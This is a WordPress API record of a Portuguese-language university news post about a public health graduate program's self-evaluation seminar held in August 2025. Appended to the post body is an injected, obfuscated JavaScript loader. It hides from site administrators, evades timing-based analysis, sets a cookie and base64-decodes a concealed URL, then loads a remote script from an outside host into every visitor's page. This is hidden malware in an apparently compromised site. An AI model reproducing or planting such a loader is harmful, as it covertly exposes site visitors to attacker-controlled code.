{"id":1250,"date":"2025-08-27T12:42:11","date_gmt":"2025-08-27T15:42:11","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1250"},"modified":"2026-04-16T13:13:57","modified_gmt":"2026-04-16T16:13:57","slug":"iii-seminario-de-autoavaliacao-do-programa-de-pos-graduacao-em-saude-coletiva-da-uea","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/08\/27\/iii-seminario-de-autoavaliacao-do-programa-de-pos-graduacao-em-saude-coletiva-da-uea\/","title":{"rendered":"III Semin\u00e1rio de Autoavalia\u00e7\u00e3o do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da UEA"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>O III Semin\u00e1rio de Autoavalia\u00e7\u00e3o do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da UEA, realizado no dia 22\/08\/25, sob o tema: \u201cPerspectivas e Desafios para o Novo Quadri\u00eanio (2025-2028)\u201d, marcou um momento de an\u00e1lise e reflex\u00e3o conjunta a respeito do cen\u00e1rio atual do Programa e as proje\u00e7\u00f5es para o novo Quadri\u00eanio. Contou com a participa\u00e7\u00e3o ilustre do Coordenador da \u00c1rea de Sa\u00fade Coletiva da Capes, Prof. Dr. Bernardo Horta.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-27-at-11.39.22-1-819x1024.jpeg\" alt=\"\" class=\"wp-image-1251\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-27-at-11.39.22-1-819x1024.jpeg 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-27-at-11.39.22-1-240x300.jpeg 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-27-at-11.39.22-1-768x960.jpeg 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-27-at-11.39.22-1.jpeg 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p><br>A abertura conduzida pela Coordenadora do PPGSC, Prof\u00aa Dr\u00aa Alessandra Salino, refor\u00e7ou a relev\u00e2ncia do envolvimento coletivo para o desenvolvimento do Programa. O processo autoavaliativo, mediado pela Prof\u00aa Dr\u00aa S\u00e2mia Feitosa, envolveu a participa\u00e7\u00e3o dos docentes, discentes e t\u00e9cnicos administrativos. O evento destacou a import\u00e2ncia da autoavalia\u00e7\u00e3o como ferramenta de diagn\u00f3stico, monitoramento e melhoria cont\u00ednua para a excel\u00eancia acad\u00eamica.<\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>O III Semin\u00e1rio de Autoavalia\u00e7\u00e3o do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da UEA, realizado no dia 22\/08\/25, sob o tema: \u201cPerspectivas e Desafios para o Novo Quadri\u00eanio (2025-2028)\u201d, marcou um momento de an\u00e1lise e reflex\u00e3o conjunta a respeito do cen\u00e1rio atual do Programa e as proje\u00e7\u00f5es para o novo Quadri\u00eanio. Contou com a participa\u00e7\u00e3o [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1252,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1250","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1250"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1250\/revisions"}],"predecessor-version":[{"id":1320,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1250\/revisions\/1320"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1252"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1250"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}